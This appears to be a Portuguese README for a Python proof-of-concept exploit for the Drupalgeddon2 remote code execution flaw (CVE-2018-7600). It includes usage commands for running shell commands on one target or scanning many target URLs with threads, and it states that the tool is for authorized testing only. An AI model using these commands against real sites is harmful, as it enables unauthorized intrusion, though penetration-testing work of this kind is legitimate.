
Este repositório contém uma Prova de Conceito (PoC) completamente original e desenvolvida internamente para o CVE-2018-7600, também conhecido como Drupalgeddon 2 — uma vulnerabilidade crítica de execução remota de código que afeta as versões principais do Drupal 7 e 8.
Este repositório contém um exploit de prova de conceito baseado em Python para a vulnerabilidade crítica de execução remota de código no Drupal, conhecida como Drupalgeddon2 (CVE-2018-7600). Este script é destinado a fins educacionais e para profissionais de segurança usarem em cenários de teste de penetração autorizados.
Esta ferramenta é destinada apenas para fins legais e éticos. Usar este script em qualquer sistema sem permissão explícita do proprietário é ilegal. O autor e os colaboradores não são responsáveis por qualquer uso indevido ou dano causado por este script. Use por sua conta e risco.
requests librarycolorama librarygit clone <repository-url>
cd <repository-directory>
pip install -r requirements.txt
pip install requests colorama
O script oferece vários argumentos de linha de comando para personalizar sua execução.
Explorar um único alvo com o comando padrão (whoami):
python3 drupalgeddon2.py -t http://example.com
Explorar um único alvo com um comando personalizado (ex.: ls -la):
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
Varrer uma lista de alvos a partir de um arquivo:
Crie um arquivo chamado targets.txt com uma URL por linha:
http://site1.com
https://site2.org
http://site3.net
Em seguida, execute o script:
python3 drupalgeddon2.py -l targets.txt
Varrer uma lista com um comando personalizado e aumento de threads:
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
Salvar a saída em um arquivo de log:
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| Argument | Short | Description | Default |
|---|---|---|---|
--target | -t | Uma única URL alvo. | - |
--list | -l | Caminho para um arquivo contendo uma lista de URLs alvo. | - |
--command | -c | O comando a ser executado no alvo. | whoami |
--threads | -T | Número de threads concorrentes a usar. | 5 |
--output | -o | Arquivo para registrar a saída. | - |
--timeout | Tempo limite de requisição em segundos. | 15 |